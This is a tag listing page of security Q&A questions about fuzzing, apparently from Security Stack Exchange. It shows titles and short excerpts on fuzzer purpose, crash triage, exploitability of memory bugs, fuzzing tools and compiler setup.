Questions tagged [fuzzing]

Fuzzing is a testing technique that consists on passing malformed data as input to programs trying to uncover vulnerabilities in the handling of this malformed input data.

100 questions
29
votes
4 answers

What is the purpose of a fuzzer?

I've heard of these tools and from what I understand, they just send tons of random data at different services and observe their reaction to it. What is the purpose of a fuzzer? How can it be applied during a pentest?
Digital fire
  • 3,126
  • 5
  • 31
  • 44
19
votes
3 answers

Black-box fuzzing a TCP Port running an unknown applicaiton

I'm looking for any guidance around testing a service I've found running on a target server. I'm doing a 'black-box' pen-test and the company is one of those 'I-don't-want-to-tell-you-anything' types so they won't tell us what service is…
NULLZ
  • 11,426
  • 17
  • 77
  • 111
14
votes
4 answers

Best way to triage crashes found via fuzzing, on Linux?

When doing fuzz testing, it is easy to end up with many bugs (many crashes). This makes it important to have a way to triage each bug that's detected, so we can prioritize them and focus our effort on the ones that are most likely to represent…
D.W.
  • 98,420
  • 30
  • 267
  • 572
14
votes
2 answers

Is a crash always exploitable for RCE?

Reading papers written by teams looking for vulnerabilities using fuzzing, I notice that many people label a crash as a DoS vulnerability. While in other papers and researches, they go deeper after the crash and try to exploit it to get RCE. My…
J. Doe
  • 65
  • 1
  • 10
9
votes
3 answers

Vuln research: reverse engineering, debugging or fuzzing?

I wonder how hackers find vulnerabilities. If they use fuzzing, security engineers do it, and it's probably that security engineers (that work in a firm) have more resources than a group of hackers. Reverse-engineering takes a lot of time, and I…
jaja
  • 91
  • 1
  • 2
9
votes
1 answer

How many iterations of fuzzing is enough?

Fuzzing is a convenient, relatively low-cost way to detect some kinds of vulnerabilities, particularly in C/C++ code. My question: How much fuzzing is enough? Are there are any standards or best practices? Example: Microsoft's SDL requires that…
D.W.
  • 98,420
  • 30
  • 267
  • 572
9
votes
1 answer

Is it worth it to fuzz Rust-written software?

If a program is written in C, then it is worth it to fuzz it with something like afl since it might have memory-related bugs. But how about software written in Rust? Would a fuzzer still find bugs? Or are there no memory related bugs that could be…
user164700
  • 93
  • 2
8
votes
1 answer

Exploitability of use-after-free vulnerabilities

Use-after-free bugs are a particular class of memory safety bugs. How often are they exploitable, in practice? When you find a use-after-free bug in a program, is it often exploitable, rarely exploitable, or does it vary based upon some other…
D.W.
  • 98,420
  • 30
  • 267
  • 572
8
votes
1 answer

CERT FOE Fuzzing Framework documentation

So I read another post here about fuzzing local standalone applications. I have understood how to exploit basic buffer overflow vulnerabilities in standalone applications and am now looking on how to find such vulnerabilities. I downloaded the CERT…
user2405966
  • 97
  • 1
  • 2
8
votes
3 answers

How to fuzz proprietary protocol over SSL?

I'm doing vulnerability research on a client/server architecture that uses a custom proprietary protocol sent over SSL (port 443). I need to be able to intercept the traffic, and be able to view it in clear-text in something like Wireshark, modify…
eliteparakeet
  • 243
  • 2
  • 7
7
votes
3 answers

How should I compile program for fuzz testing?

I'm doing some fuzz testing of a program for which I do have source code. Should I compile the program with any particular compiler options, to make fuzz testing more effective? If so, what's the right list of command-line flags to pass to the…
D.W.
  • 98,420
  • 30
  • 267
  • 572
7
votes
1 answer

Fuzzing of audio input vectors

A few days ago I had to make a phone call and on the other end of the line was some machine using some voice recognition software to validate the customers spoken answers to the service menu. I asked myself if it would be possible to fuzz this kind…
Dirk
  • 510
  • 1
  • 4
  • 16
7
votes
1 answer

Sulley - optional element and command check

I'm currently using Sulley to fuzz my FTP server, but I'm having problems. I want to specify the STRU command, which has a syntax: STRU [ F|R|P] I tried to specify the optional F,R,P arguments to the STRU command like the…
eleanor
  • 528
  • 2
  • 5
  • 11
7
votes
4 answers

What does a common workstation setup look like for pentesting and vulnerability research?

I'm a security enthusiast, and am in need of some guidance to get me into the branch. I've always been held back by lack of methodology in my research, and it tends to break down my motivation towards learning and studying new concepts within the…
6
votes
1 answer

SQL Injection - UNION SELECT and returning a 'keyword' to find exploitable columns

I have a problem I'm hoping someone could help with regarding the use of UNION SELECT, in a scripted/automated way to find columns that are exploitable (having already found the number of columns using ORDER BY) Doing this manually Using…
1
2 3 4 5 6 7